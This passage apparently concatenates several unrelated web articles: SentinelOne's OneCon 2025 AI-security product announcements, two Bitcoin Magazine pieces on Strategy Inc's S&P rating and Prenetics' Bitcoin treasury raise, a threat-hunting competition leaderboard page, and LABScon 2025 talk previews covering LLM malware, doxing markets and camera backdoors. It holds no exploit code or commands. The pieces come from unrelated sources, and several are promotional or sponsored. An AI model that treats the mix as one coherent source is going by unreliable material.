Most importantly, in this era, the architecture and infrastructure needed to truly benefit from AI will be the determining factor to successfully secure it. Quality of data, inclusivity of data, cardinality, and latency will be critical, as will be the tools and technologies facilitating those.

At OneCon 2025, we are laying out a practical path to secure this new world. The opportunities AI creates, the risks it introduces. The strategy and product innovation you can put to work today to accelerate and de-risk your AI journey.

AI: Business Accelerant & New Attack Surface

The need for these dual disciplines is driven by the rapid increase in AI usage itself – both by good and bad forces.

AI is accelerating everything. It is transforming how businesses operate, how employees work, and how attackers adapt. Across every single industry, AI is becoming embedded into processes, tools and workflows in every team. Marketing teams use it to generate content. Developers use it to write code. Legal, HR and finance all use it to summarize and automate tasks. AI is now woven into the very fabric of how organizations think and operate.

While holding incredible potential benefits, this transformation is also introducing massive new security risks. Traditional security controls are blind to the data that employees are entering into 3rd-party AI models. Security teams lack visibility into the growing ecosystem of AI tools and assistants spreading across every single enterprise. AI-based browsers that integrate chat or summarization features create new pathways for data exposure. And the rise of Model Context Protocol (MCP) servers that connect agents to agents introduces an entirely new layer of risk that most organizations are not equipped to monitor or govern today.

Meanwhile, adversaries are evolving just as quickly. They are using AI to increase efficiency, precision, and their reach. Non-native English speakers can now craft a convincing, localized spearphishing campaign in minutes. LLMs are being used to write polymorphic malware that mutates faster than traditional defenses can react. Attackers are automating their reconnaissance, identifying vulnerabilities through natural language interfaces, and even embedding AI models directly inside malware to adapt in real time.

The result is a security gap that spans both sides of the equation – on one side, AI as a catalyst for real business innovation and, on the other, AI as an enabler of attack and massive risk exposure.

Building Security in the Age of AI: Three Critical Principles

Protecting this new world requires visibility, intelligent automation, and governance that can move at the same speed as AI itself. In solving for that, we believe in a simple yet critical guiding philosophy to delivering effective AI Security – three critical principles that inform everything that we build and anchor any platform-level defense.

1. Intelligence Over Rules – Security must think, not react. Static signatures and brittle logic can’t match the velocity of modern threats. True protection emerges when AI continuously learns, reasons, and adapts — detecting intent, not just pattern.
2. Autonomy with Accountability – Machines should act at machine speed, but always within human-defined guardrails and system supervision. The future of defense is autonomous, but never ungoverned where AI decisions remain explainable, traceable, and aligned with human values.
3. Unity of Data, Context, and Action – Effective AI security fuses signals from endpoints, identities, and clouds into one coherent understanding. Insight without context is noise; action without context is chaos. The synthesis of both creates real-time, end-to-end resilience.

These principles map directly to the questions customers ask us every day.

How do I better defend my organization?

How do I outpace threats?

How do I get the most from my people and partners?

SentinelOne’s AI Advantage

When it comes to making AI Security real today, SentinelOne is in a unique position. We have been AI-native since day one. Automation has been foundational from the start, not a bolt-on. And, we’ve been using agentic approaches and workflows in live security environments before it became the buzzword du jour.

At launch, we were among the first to apply machine learning to malware detection and prevention. That broke the decades-old pattern of pushing static signatures to endpoints many times a day. Instead of distributing new rules after every outbreak, we trained lightweight predictive models that identified malicious behavior on their own. That meant detecting never-before-seen threats in real time at massive scale.

That innovation reshaped endpoint security and set the foundation for what followed. The same principles of data-driven models, autonomous decision making, and behavioral analytics evolved into the Singularity Platform and now power Purple AI, our agentic system that changes how analysts detect, investigate, and respond. Together, they extend protection and intelligence across endpoint, identity, cloud, and AI. It is an entire platform built on and enhanced by AI. This is how we keep our customers safe: By delivering real time security that is predictive and adaptive, at planet scale.

This year we took the next step with two focused acquisitions:

• Prompt Security – A portfolio built to secure AI use cases and protect how employees, developers, and applications leverage generative and agentic AI. This is a critical component of protecting AI as an attack surface itself.
• Observo AI – An AI-ready streaming data pipeline that intelligently filters, normalizes, and ingests petabytes of telemetry across the enterprise with sub-second latency and strong cost efficiency. Combined with Singularity AI SIEM, this provides both pre-ingestion analytics and flexible pull/stream data collection, ensuring complete visibility, real-time detections and autonomous response across the entire security environment.

These advancements extend Singularity into a unified AI Security architecture that gives defenders a complete, autonomous view across traditional and emerging surfaces – from premise to cloud.

Delivering on the AI Security Vision Today

Today at OneCon, we’re not just giving customers a roadmap and strategy, we’re giving them new tools and innovation to start securing their AI-enterprise today, including:

• New solutions from Prompt Security to secure AI apps, tools, developers and agents – Real-time visibility and policy enforcement across thousands of AI tools. Shadow AI discovery, data loss prevention for prompts and outputs, safe coding with secret redaction and vulnerable code blocking, and protection for internal AI applications.
• Purple AI innovations – Integrated agentic auto-investigations with dynamic runbooks. Next best actions on alerts. One-click custom detection rule creation that turns investigation outcomes into durable detections. Integration with Singularity Hyperautomation for approved response.
• Purple AI MCP Server – A secure bridge between Singularity’s live intelligence and your AI ecosystem. Build your own agents grounded in your security context. Use OpenAI, Anthropic, Gemini, or internal models. Innovate securely at scale. The MCP Server is open source and available on GitHub today.
• Observo AI pipelines and integration with Singularity AI-SIEM – Vendor-agnostic data engine for any source to any destination. When paired with Singularity AI SIEM, Observo supercharges detection and response with high-fidelity, cost-efficient streaming telemetry.
• Wayfinder Threat Detection and Response with Google Threat Intelligence – Global insight combined with automation and human expertise. GTI visibility feeds directly into SentinelOne services. Intelligence becomes action through Purple and our analysts. Faster, more precise response as a matter of process, not hope.
• Platform upgrades:
  • Native scalability to million+ active agents in a single deployment. Faster policy updates with minute command SLA.
  • Agent efficiency improvements across operating systems. Lower CPU and memory usage, fewer support cases, better user experience.
  • AI SIEM query engine overhaul that supports very high cardinality and keeps up to seven years of security data hot. Natural language search in Purple AI operates on the same high performance data. No cold storage delays.
  • Live Security Updates upgrades that dramatically reduce response times, and improve accuracy and efficacy.  And more customer controls for safe rollout.
  • Thousands of new detections continually delivered, from the AI-SIEM to the endpoint agent. We’re wherever the adversary moves, delivering real-time protection across dozens of surfaces and data sources. With AI infused into every layer of our operations, we’re moving faster, scaling further, and stopping even unknown threats with greater precision than ever before.
  • New Infrastructure as Code (IaC) deployment processes, better observability across the platform, and proactive communications on incidents via a public status page have all been added to bolster resilience, reliability and transparency.
  • Active monitoring mode and proactive alerting extends resilience outside the SaaS operation into the Endpoint agent, providing near real-time health metrics of the agents themselves – now transparently available for the customer visibility in the agent management control plane.

The Path Forward in AI Security: Advancing Humanity, Protecting the Human

AI security is more than just defending systems, it’s about defending the fabric of trust that lets humans thrive in a digital world. As intelligence becomes ambient and autonomous, security must evolve from a reactive layer into an enabling force for human progress.

• Empowering Human Potential – By offloading complexity and noise to intelligent machines, AI security frees humans to focus on creativity, empathy, and purpose. Protection becomes invisible, a silent force amplifying human capability rather than constraining it.
• Preserving Digital Integrity – As data becomes identity, securing truth is a moral imperative. AI security safeguards the authenticity of information, ensuring societies can rely on what they see, share, and believe. As our lives move fully into digital spaces, the boundary between human and machine expression blurs. Every action carries traces of who we are. In this new reality, AI Security’s role is to safeguard that trust: To ensure that what we see, share, and decide upon is authentic. It means protecting the fidelity of data, the truth of identities, and the integrity of digital interactions against manipulation. It is the contract to our reality.
• Building Ethical Autonomy – The next era demands systems that defend not only themselves, but the people they serve. Ethical AI security means designing intelligence that understands context, respects privacy, and acts in humanity’s best interest even when no one is watching.

Ultimately, the path forward fuses human and artificial intelligence into a shared defense, machines protecting people, and people guiding machines, so that technology remains our most trusted ally, not our greatest risk.

Defenders deserve a technology that protects every surface, that can see everything, turns data into advantage, and puts human governance at the center. So, let’s get started.

AI for Security. Security for AI. Autonomous protection, always evolving, in production, today, all in pursuit of a safer, brighter future.

Today, on the main stage at OneCon 2025, SentinelOne is taking the wraps off its vision, roadmap, and new portfolio for securing an AI-powered world. From securing AI tools, applications, and agents to transforming and automating security operations, SentinelOne’s AI Security strategy and new innovations will help customers accelerate and de-risk their AI advantage.

Introducing a new portfolio for securing AI, new AI-ready data pipelines, the expansion of Purple AI, SentinelOne’s category-best agentic security analyst, the debut of new AI-powered threat detection and response managed services, and more, the new innovations revealed at OneCon 2025 will focus on how our customers and partners can both secure AI systems and achieve autonomous security today.

Securing AI: New Prompt Security Offerings

At OneCon 2025, SentinelOne is putting customers in control of AI in their organization by introducing a new suite focused on securing known and shadow GenAI use, coding, data leakage, agents and more.

• Prompt Security for Employees – Delivers real-time visibility and control over employee GenAI usage. Supporting more than 15,000 AI sites, it detects and eliminates shadow AI risks and prevents sensitive data exposure.

• Prompt Security for AI Code Assistants – Secures the use of GenAI coding tools by instantly redacting secrets, PII, and IP from code to prevent data leaks. Its real-time Vulnerable Code Scanner blocks insecure or malicious AI-generated outputs before production, helping developers code faster and safer while maintaining organizational control and compliance.

• Prompt Security for AI Applications – Protects custom-built AI solutions, from chatbots to complex automations, against emerging threats like denial-of-wallet and remote code execution (RCE).

• Prompt Security for Agentic AI (Beta) – Provides real-time visibility, risk assessment, and governance for autonomous AI agents built on the Model Context Protocol (MCP) – the first comprehensive solution to secure, monitor, and control agentic AI operations at machine speed.

New AI-Ready Data Pipeline: Integrating Observo AI & Singularity AI SIEM

Following the recent acquisition of Observo AI, SentinelOne is introducing the first integration into its Singularity Platform, giving customers a new AI-native data platform to reimagine how they collect, enrich, and act on data across their entire security ecosystem and power their agentic security operations.

Observo AI’s Integration with Singularity AI SIEM, unites intelligent AI-native streaming data control with agentic AI-powered analytics and orchestration, optimizing data pipelines for enhanced threat detection and autonomous response across all security data. Observo AI efficiently ingests and normalizes petabytes of data from any source, then prioritizes and routes what matters most into Singularity AI SIEM. This unique, transformative combination creates the only SIEM on the market to provide both pre-ingestion analytics and flexible pull/stream data collection.

Expanding Purple AI & New Model Context Protocol Innovations

SentinelOne will also showcase the latest advancements in Purple AI’s agentic triaging, investigations, and workflows, bringing together human-level reasoning with orchestration and automated response. Building on Purple’s agentic roadmap, the capabilities are focused on cutting detection, investigation, and response from hours to minutes for analysts.

• In-line Agentic Auto-investigations with Dynamic Reasoning (Preview) – End-to-end one-click agentic investigations spanning discovery, alert assessment, hypothesis validation, impact analysis, recommended response, and proactive custom rule creation. Purple AI shifts the paradigm from human work assisted by AI to AI work approved by humans, with every step and conclusion clearly documented in a single investigation canvas for human approval.

• Automated and agentic investigations and response through Purple AI’s integration with Singularity Hyperautomation for Agentic Investigations & Response Actions (Preview) – Purple AI seamlessly integrates with Singularity Hyperautomation to execute pre-approved customer workflows to both conduct its agentic investigations, validating hypotheses via actions such as contacting human defenders via Slack, and to agentically surface pre-approved recommended actions to execute.

• Agentic Custom Detection Rule Creation (Preview) – In the investigation pane, analysts can receive agentically recommended custom detection rules that can be created with a single click, enabling security teams to immediately identify and stop similar attacks before they spread.

• Purple AI Model Context Protocol (MCP) Server (Generally Available) – Provides secure, seamless integration between the Singularity Platform and any AI framework or large language model. Acting as a universal translator and intelligence hub, it empowers developers and partners to build custom agentic AI experiences powered by the full context and analytics of SentinelOne’s platform. The open-source Purple AI MCP Server is available today on GitHub.

Managed Services for the AI Era: Wayfinder Threat Detection & Response

Wayfinder combines elite human expertise with agentic AI to deliver next-generation managed services. Built on SentinelOne’s telemetry and Google Threat Intelligence, Wayfinder provides AI-powered threat hunting, MDR, and incident response, enabling faster detection, smarter response, and adaptive defense – empowering teams to focus on high-value priorities.

Managing Attack Paths: Mapping Risks & Securing Cloud Data

As cloud-native AI services gain adoption, SentinelOne is advancing unified exposure management with an upcoming release of Cloud Attack Paths and Data Security Posture Management (DSPM) in Singularity Cloud Security. Together, these capabilities deliver an intelligent cloud defense – mapping how interconnected exposures create exploitable pathways to sensitive data. By revealing critical exposures, Singularity Cloud Security empowers threat analysts to see what attackers see, anticipate lateral movement, and eliminate risks wherever they originate and before they can take shape. With AI-powered protections, deflect threats in real time and stop attacks in their tracks

Contextualizing the Identity Surface: Singularity Identity

The next evolution of Singularity Identity is here: a comprehensive solution that unifies all of SentinelOne’s identity security capabilities into one cohesive and contextual security experience. Delivering real-time detection and response, continuous posture assessments, and proactive risk management across hybrid environments, our solution uncovers threats faster while providing security teams with full visibility and protection across their environment. Our full identity profile now features policy-based conditional access – now in beta and purpose-built for dynamic, zero-trust environments.

Conclusion

OneCon25 showcases the next chapter in cybersecurity. With many innovations showcased this year, SentinelOne is delivering AI-native solutions that transform detection, response, and protection across endpoints, cloud, and enterprise systems. By combining automation, intelligence, and human expertise, organizations can act faster, secure smarter, and embrace AI-driven innovation without compromise, making the vision of autonomous, adaptive security a reality today.

Forward Looking Statements

This blog post includes forward-looking statements including, but not limited to, statements concerning our current and future products and services. Forward-looking statements are subject to risks and uncertainties that could cause actual performance or results to differ materially from those expressed in or suggested by the forward-looking statements. These and other risk factors are described in the “Risk Factors” section of our most recent Annual Report on Form 10-K, subsequent Quarterly Reports on Form 10-Q, and other filings made with the U.S. Securities and Exchange Commission (SEC), which are available free of charge on the SEC’s website at www.sec.gov.

You are cautioned not to place undue reliance on these forward-looking statements. Any future products, functionality and services may be abandoned or delayed, and as such, you should make decisions to purchase products and services based on features that are currently available. Any forward-looking statements made in this document are based on our beliefs and assumptions that we believe to be reasonable as of the date hereof. Except to the extent required by law, we undertake no obligation to update these forward-looking statements to reflect new information or future events.

Bitcoin Magazine

Strategy (MSTR) Earns S&P ‘B-’ Rating, Marking a Major Milestone for Bitcoin-Backed Credit

For the first time in financial history, a major credit rating agency has formally evaluated a company built on a bitcoin-backed credit model. In news covered by Bitcoin Magazine, the S&P Global Ratings has assigned Strategy Inc (MSTR) a ‘B-’ Issuer Credit Rating with a Stable outlook, recognizing not just the company, but the emergence of Bitcoin as collateral inside the credit system. This marks a watershed moment for corporate finance. Bitcoin-backed credit is no longer theoretical. It is now a rated financial reality.

Why This Moment Matters

Until now, Bitcoin had been accepted by equity markets, ETFs, and corporate treasury conversations — but credit markets remained untouched. Credit markets are where legitimacy is ultimately decided because they determine who can borrow, at what cost, and against which assets.

By rating Strategy Inc, S&P has implicitly acknowledged:

• Bitcoin can underpin structured debt and preferred equity.
• A bitcoin-backed credit strategy can be modeled, rated, and priced using traditional frameworks.
• Bitcoin is shifting from speculative asset to recognized collateral within corporate capital structures.

This is not a marketing milestone — it is a structural one. Bitcoin has entered the language of risk-adjusted return, yield, and covenants.

How S&P Interpreted Strategy’s Bitcoin-Backed Capital Model

The rating is speculative grade, but the Stable outlook is critical. It signals S&P’s belief that Strategy can continue to service obligations and access capital markets without selling its Bitcoin reserves — a foundational principle of bitcoin-backed credit.

S&P’s analysis mentions several possible weaknesses:

• High concentration of assets in Bitcoin
• Low U.S. dollar liquidity and negative risk-adjusted capital under S&P’s methodology
• Currency mismatch: long Bitcoin, short U.S. dollar debt obligations
• Limited operating cash flow outside software revenue

However, they also credited Strategy with unique structural strengths:

• No near-term debt maturities before 2027–2028
• Proven access to capital markets — both equity and debt
• A capital stack purpose-built to accumulate Bitcoin without diluting shareholders
• Active liability management via convertible debt and preferred stock instruments

In short, S&P is signaling that bitcoin-backed credit can function — if managed with discipline.

Implications for the S&P 500 and Institutional Legitimacy

Strategy Inc met the S&P 500 inclusion criteria in profitability and market capitalization but was passed over in 2024, widely believed to be due to its Bitcoin-heavy balance sheet. That decision now appears less defensible.

With a formal credit rating, the company shifts from “unrated anomaly” to “rated issuer.” For institutional capital, that distinction matters.

• Index committees can now reference a risk rating — not just a narrative.
• Treasury teams and insurers can benchmark exposure to bitcoin-backed credit against traditional corporate debt.
• This increases (not guarantees) the probability of future index inclusion and passive capital flows.

Bitcoin entering equity indices begins with Bitcoin entering the credit models behind them.

Bitcoin-Backed Credit: The Ideal State of Treasury Strategy

This rating does more than validate Strategy — it validates the architecture of bitcoin-backed credit as the superior evolution of corporate treasury management.

Phase 1 was equity-funded Bitcoin accumulation — high growth but shareholder dilution.
Phase 2 introduced convertible debt and preferred equity — allowing companies to acquire Bitcoin through capital markets rather than operating earnings.
Phase 3, now underway, is full institutional recognition of bitcoin-backed credit — rated, benchmarked, and capable of scaling.

This is the endgame:

• Use capital markets to borrow in fiat
• Use proceeds to acquire Bitcoin
• Service liabilities without selling reserves
• Increase Bitcoin-per-share over time, without issuing new common stock

With S&P formally rating Strategy’s issuer credit, this model moves from innovation to infrastructure.

Why Corporate Finance Leaders Need to Pay Attention

This rating does not compel companies to adopt Bitcoin. But it removes the claim that Bitcoin cannot be integrated into traditional credit systems.

From now on:

• Bitcoin can be factored into risk-weighted capital models and treasury policy.
• Credit and liquidity committees must understand how bitcoin-backed credit affects financing costs, refinancing risk, and balance sheet leverage.
• Investors can now compare Bitcoin-based capital structures against other high-yield or hybrid debt strategies.
• Boards can no longer dismiss Bitcoin as “unratable” or “unclassified.”

A New Chapter for Corporate Finance and Capital Markets

What makes this moment different isn’t that another institution “acknowledged” Bitcoin. That’s happened before with ETFs, GAAP accounting changes, and treasury allocations.

What’s different is where the recognition has now occurred: Not in equity markets. Not in payment networks. But in credit — the foundation of corporate finance and monetary systems.

When a credit rating agency like S&P evaluates a company built on Bitcoin, it does three things that have never happened before:

• It forces Bitcoin into risk models normally reserved for banks, sovereigns, and investment-grade corporations.
• It legitimizes bitcoin-backed credit as a structure that can be analyzed, refinanced, and scaled — not dismissed as speculative.
• It signals to other corporates and lenders that they must now understand Bitcoin not as an investment, but as collateral.

This rating does not mean the model is risk-free. It means the model is real enough to underwrite, stress test, and lend against.

That is the real inflection point — not that S&P approved of Bitcoin, but that they were forced to measure it.

Disclaimer: This content was written on behalf of Bitcoin For Corporations. This article is intended solely for informational purposes and should not be interpreted as an invitation or solicitation to acquire, purchase or subscribe for securities.

This post Strategy (MSTR) Earns S&P ‘B-’ Rating, Marking a Major Milestone for Bitcoin-Backed Credit first appeared on Bitcoin Magazine and is written by Nick Ward.

Bitcoin Magazine

One Bitcoin a Day: Prenetics Raises $48M to Accelerate Bitcoin Treasury Strategy

Does one bitcoin a day keep the doctor away?

Prenetics Global Limited (NASDAQ: PRE), a Hong Kong-based health sciences company, announced today the successful pricing of a public equity offering expected to generate approximately $48 million in gross proceeds, with the potential to raise up to $216 million if all accompanying warrants are exercised. 

The capital raise is intended to support the expansion of its supplement brand, IM8, while bolstering Prenetics’ Bitcoin treasury strategy.

The company has a disciplined Bitcoin accumulation plan, purchasing one bitcoin per day since August 1, 2025, and currently holds approximately 275 BTC, valued at $31 million as of October 27.

Prenetics said the offering attracted a distinguished group of institutional and individual investors, including major crypto platforms and financial firms such as Kraken, Exodus (NYSE: EXOD), GPTX by Bitcoin mining pioneer Jihan Wu, American Ventures LLC, XtalPi (2228.HK), DL Holdings (1709.HK), and Mythos Group, among others.

The offering, led by sole placement agent Dominari Securities LLC, consists of 2,992,596 Class A ordinary shares and/or pre-funded warrants, along with Class A and Class B warrants exercisable for up to 5,985,192 additional shares. 

The Class A warrants carry an exercise price of $24.12 — 50% above the offering price of $16.08 — while the Class B warrants are exercisable at $32.16, or a 100% premium. Both warrants are immediately exercisable upon issuance and have five-year terms.

High-profile strategic investors like Aryna Sabalenka, the world No. 1 tennis player, and Adrian Cheng, a prominent Asian entrepreneur, also increased their stakes in the company. David Beckham is also a prominent backer.

Prenetics’ supplement brand IM8 hit $100 million ARR in 11 months and aims for $180–$200 million in 2026 within the $704 billion global market, the company said. 

CEO Danny Yeung highlighted the company’s dual focus on health supplements and cryptocurrency. 

“IM8 has huge global potential, evidenced already by our extraordinary traction across multiple markets. We’re particularly honored to have the backing of a distinguished group of new and existing strategic investors who share our confidence in our dual-engine strategy,” Yeung said. 

Bitcoin accumulation: One bitcoin per day

As mentioned earlier, Prenetics has a Bitcoin accumulation plan, purchasing one bitcoin per day since August 1, 2025, and currently holds approximately 275 BTC, valued at $31 million as of October 27.

Financially, Prenetics will hold roughly $100 million in cash post-offering, bringing its total liquidity — including Bitcoin holdings — to around $131 million. 

The company also plans to review and divest non-core business units to focus resources on IM8 and Bitcoin initiatives.

The offering is expected to close on or around October 28, 2025, pending customary conditions. Prenetics positions itself as pursuing a bold long-term ambition: to reach $1 billion in annual revenue alongside $1 billion in Bitcoin holdings within the next five years, combining health supplement growth with cryptocurrency accumulation as a cornerstone of its corporate strategy.

IM8’s operational performance underscores the brand’s subscription-driven growth model, with more than 12 million servings shipped to over 420,000 customer orders across 31 countries. 

Average order values have risen from $110 to $145 following the launch of IM8’s Daily Ultimate Longevity product, reflecting strong consumer demand for premium offerings.

This post One Bitcoin a Day: Prenetics Raises $48M to Accelerate Bitcoin Treasury Strategy first appeared on Bitcoin Magazine and is written by Micah Zimmerman.

The Sentinels League is the official, week-by-week standings for the Threat Hunting World Championship – the first-of-its-kind tournament where the world’s top defenders go head-to-head across four surfaces: AI, Cloud, SIEM, and Endpoint. Thousands of blue teamers from more than 100 countries are tackling real-world attack scenarios to earn points, climb the tables, and secure their path to Las Vegas.

Bookmark this blog post to check your position, track the movement each week, and jump into the next qualifier if you’re not on the board yet.

More Than a Game | How the Sentinels League Work

Qualifiers run throughout the month of September across the four league tracks with players who finish in the top 50 in each league advancing to the Regional Finals on October 22 for the Americas, Europe, and Asia Pacific & Japan. From there, regional champions progress to the Grand Final at OneCon in Las Vegas from November 4 to 6, where the World Champion is crowned.

This is more than a game. It’s a global showdown that blends entertainment, education, and elite competition. Defenders everywhere will up-level their skills and battle for:

• $100,000 in prizes
• A championship trophy
• The prestige of being crowned World Champion
• Charitable donations made in partnership with the S Foundation on behalf of each finalist

Only one player will take home the title, but everyone gains the experience of battling in real-world scenarios that sharpen the skills cyber defenders use daily.

A Global Leaderboard in Action | Follow the League Tables Live

These games are grounded in real incidents and operational trade-offs. Players earn points for flags captured and accuracy under time limits. This means pace and precision both matter. The tables below display each player’s alias, alongside points, and the prize they would receive should they finish in that same position.

Qualifying Stages

Compete online from anywhere, or in-person at select events this month. Earn Threat Hunting Hero badges, prizes, and points that advance you up the league tables. Throughout September, players may enter once per qualifier and compete across all four tracks.

• AI Qualifier Games: Take on scenarios featuring AI attackers and AI-powered threat hunting tools.
• Cloud Qualifier Games: Track and neutralize threats across cloud-based attack surfaces.
• SIEM Qualifier Games: Assert your dominance in real-time SIEM hunting and remediation challenges.
• Endpoint Qualifier Games: Hunt down and remediate endpoint vulnerabilities in scenarios pulled straight from real-world incidents.

Regional Finals | October 22

The top 200 players from each region (Americas, Europe, Asia Pacific & Japan) will face off live in an action-packed online event. Only three regional champions will advance.

Grand Final | November 4–6 | OneCon, Las Vegas

Three finalists will earn an all-expenses-paid trip to OneCon 2025 in Las Vegas to compete live on stage for the World Championship title, the trophy, and the $100K prize pool.

Leagues Menu Quick Jump

• AI League
• Cloud League
• SIEM League
• Endpoint League

AI Leagues

Live table for the AI League Qualifiers are as follows. Top 50 on October 2 qualify for the Regional Finals.

AI APJ League

AI EMEA League

AI AMERICAS League

Back to the Menu Quick Jump

Cloud Leagues

Live table for the Cloud League Qualifiers are as follows. Top 50 on October 2 qualify for the Regional Finals.

Cloud APJ League

Cloud EMEA League

Cloud AMERICAS League

Back to the Menu Quick Jump

SIEM Leagues

Live table for the SIEM League Qualifiers are as follows. Top 50 on October 2 qualify for the Regional Finals.

SIEM APJ League

SIEM AMERICAS League

SIEM EMEA League

Back to the Menu Quick Jump

Endpoint Leagues

Live table for the Endpoint League Qualifiers are as follows. Top 50 on October 2 qualify for the Regional Finals.

Endpoint APJ League

Endpoint AMERICAS League

Endpoint EMEA League

Back to the Menu Quick Jump

A Global Competition, Built for the Community

This championship is proud to unite thousands of cybersecurity defenders in a showcase of skill, innovation, and strategy. We invite you to share this blog for live updates, engage with us on social media, help grow the buzz across our community, and watch as the stage for threat hunting glory gets bigger. Also, it’s not too late to make a run at Regionals. Enter the next qualifier and save your spot in the Sentinels League today!

Participation is open worldwide. Prize eligibility is subject to Terms & Conditions and some countries are not eligible to receive monetary rewards. See the full rules for details.

Back by popular demand, LABScon, the premier invite-only threat intelligence conference from SentinelLABS, returns for four days of immersive talks, hands-on workshops, and off-the-record sessions.

Now in its fourth year, LABScon brings together the world’s foremost cybersecurity minds to share cutting-edge research and advance collective understanding of the evolving threat landscape. Hosted in Scottsdale, Arizona, from September 17–20, this year’s event features an exceptional lineup of speakers and thought leaders.

A full schedule of the event is now available here. In this post, we put a spotlight on some of the most hotly-anticipated presentations we’ve got lined up for LABScon 2025. As with previous years, we’ll be releasing videos of some of the most popular talks in the weeks ahead, so bookmark the SentinelLABS home page, follow us on your favorite social media platform (LinkedIn, X, Bluesky), or sign up for the SentinelOne weekly email digest (eyes right →) to find out when the talks that catch your eye are publicly released.

Plunging the Internet Toilets: The Illicit Economy Enabling High-Tech Harassment, Stalking and Sextortion in the Stratosphere

SpyCloud Labs’ Trevor Hilligoss and Aurora Johnson bring us a deep dive into ‘internet toilets’: toxic online communities where netizens can dox their enemies and exes and collaborate with others to conduct aggressive cyberbullying and harassment campaigns. Focusing on Chinese online cesspools, Hilligoss and Johnson show how these Chinese internet toilets have strong similarities to western doxing communities and sadistic harm groups. More broadly, the presenters argue that digital gender-based-violence acts as a core motivator and monetary driver of cybercrime across the globe.

Internet toilet users often purchase data and technical services to enable targeted harassment and stalking. The speakers go over some of the tools and services marketed to doxers, stalkers, and harassers on Chinese darknet marketplaces across three main categories: personal data lookup services, which are often serviced by corrupt insiders with positions in public security and technology companies, digital harassment tools such as SMS bombardment services, and sexploitation tools like AI nudify apps.

Because some of this activity occurs on monetizable social media platforms, harassers and internet toilet admins can also get paid simply for making popular posts that get a lot of engagement. In many cases, this doxing and harassment escalates to physical violence and has even driven victims to suicide.

Honeypots and Hostile Takeovers: A Field Guide to Organizational Arbitrage

Not all compromises happen at the endpoint. While technical compromise is well understood, behavioral compromise enabled by social engineering, organizational dysfunction, and misaligned incentives remains a threat vector ripe for exploitation. Kristin Del Rosso (DEVSEC) walks through a methodological means of recognizing patterns that lead to cultivated insider threats, where actors exploit gaps in organizational visibility, policy exceptions, or social dynamics to gain influence, access, or placement.

Through anonymized case studies involving honeypotted executives, attempted hostile internal takeovers, and corporate espionage efforts, this talk dissects how subtle signals such as behavioral changes, relationship mapping, and broken enforcement norms can reveal growing security debt inside an organization. It will also show how technical instrumentation often misses this layer entirely unless designed with these dynamics in mind.

Kristin offers a practical framework for identifying organizational arbitrage, enforcing security culture, and separating malicious insiders from “move fast” employees, before a network compromise ever occurs.

How to Bug Hotel Rooms

Do you travel with expensive stuff? Do you like feeling safe about leaving your expensive stuff in your hotel room? Have you ever had anything stolen out of your room, or discovered someone has gained access to your room while you weren’t there? What about…other rooms? Maybe not EXACTLY a hotel room? Phobos Group’s Dan Tentler has presented on securing hotel rooms in the past, but now with Home Assistant, Z-Wave devices, Co2 sensors and mmWave radar, it’s become a whole new game.

In this talk, Dan shares his full travel security system. Using Home Assistant to automate things makes it incredibly easy to create rules to send alerts, turn lights on or off, make sounds, take pictures or anything else Home Assistant is capable of, but who knew it could be deployed tactically? Millimeter wave radar units can see through walls, which makes for a uniquely interesting development: like, who is lurking outside your room, or even in the room next door.

Dan’s presentation covers the basics of how all this equipment works, including a brief introduction to Home Assistant, deployment methodologies, how it can be used and future considerations – up to and including manufacturing and selling kits for deployment.

Your Apes May Be Gone, But the Hackers Made $9 Billion and They’re Still Here

Last year, crypto thefts hit $9.32 billion—more than half of all cybercrime losses. North Korea just pulled off a $1.5 billion heist from a single exchange. Meanwhile, most security professionals still think crypto is just magic internet money for buying NFT monkeys.

Andrew Macpherson’s talk is for the crypto-skeptical security professional who’s tired of hearing about “blockchain” and shows why crypto security is 90% the same Web2 skills you already have—phishing, social engineering, API abuse—just with irreversible consequences and way better attacker ROI.

Beginning with a practical crypto primer covering the essentials, the talks explains how blockchains work, what wallets actually do, and why stablecoins matter. Then, Andrew dives into the current threat landscape: who’s stealing what, how OFAC sanctions work in a pseudonymous world, and why traditional threat intel is failing miserably at tracking crypto crime.

Most importantly, the presentation shows what makes crypto security uniquely interesting: immutable code, irreversible transactions, and attackers’ monetary wins that can’t just be rolled or clawed back. Threat actors range from nation-states to teenage hackers, the attack surface spans everything from smart contract logic to social engineering, and the defensive tooling is still being invented.

Come for the massive heist stories, stay because you realize this is an unexplored frontier with its own unique problems. By the end, you’ll understand why crypto security attracts both sophisticated attackers and curious defenders—not for the hype, but because it’s a different kind of security challenge worth understanding.

LLM Malware In the Wild

Large language models (LLMs) are now part of mainstream software‑development workflows, but they have also become a powerful new tool for adversaries. Over the past year, the presenters wrote a multi‑provider YARA rule that hunts for hard‑coded OpenAI and Anthropic model credentials inside files uploaded to VirusTotal. The rule triggered on fully‑weaponised binaries and scripts that outsource key stages of the attack chain to commercial AI services.

In this talk, SentinelLABS’ Gabriel Bernadett-Shapiro and Alex Delamotte unpack what they found. The presentation walks through multiple malware families that embed real API keys and offload tasks such as phishing‑email generation, victim triage, code‑signing bypasses and on‑device payload generation to commercial LLMs.

Gabriel and Alex explore how LLM‑powered malware changes the defender’s problem space: static signatures fail because the malicious logic is produced only at run‑time; network inspection is harder because calls look identical to legitimate use; and prompt engineering itself becomes an adversarial discipline.

The Elephant in Many Rooms: Orange Indra’s Consistent Hunt for Access in the Asia Pacific Region

Within the ecosystem of espionage-oriented threat actors, there is often an unspoken hierarchy of intrusion sets; China-based, Russia-based, Iran-based, and North Korea-based threat actors are often regarded as being both tactically and strategically more relevant to Western organisations versus others.

In this talk, PwC’s Jono Davis shines a light on one of the less-discussed threat actors, introducing an intrusion set PwC assesses to be based in South Asia and have observed since at least 2024 conducting substantial credential phishing activity across the Asia Pacific region and beyond.

This is a threat actor PwC has dubbed Orange Indra (currently not aligned to any open-source nomenclature), responsible for campaigns targeting defence and government entities of countries that align with foreign policy objectives of the country it is based in.

In using Orange Indra as an example, Jono highlights the tools, techniques, and procedures (TTPs) of a prolific, efficient threat actor, alongside a strategic overview of the South Asia more broadly as it pertains to the wider Asia Pacific, and the potential near-future conflicts for regional hegemony.

Finally, this talk provides a platform to emphasise the strategic imperative for organisations, analysts, and the wider intelligence community to pay attention to threat actors emanating beyond the “Big 4” outlined above.

Are Your Chinese Cameras Spying For You or on You?

Hundreds of thousands, if not millions, of Chinese cameras, alarms and security systems have backdoors, and are designed to be ready to spy on you out of the box. Destined for the dumpster, most of these devices are designed to be unmaintainable.

Delivered by a sophisticated shadow supply chain that bypasses regulatory scrutiny supplying fake FCC, CE and UL certification, these devices are carefully laundered through online shopping platforms like Amazon and even high street shops.

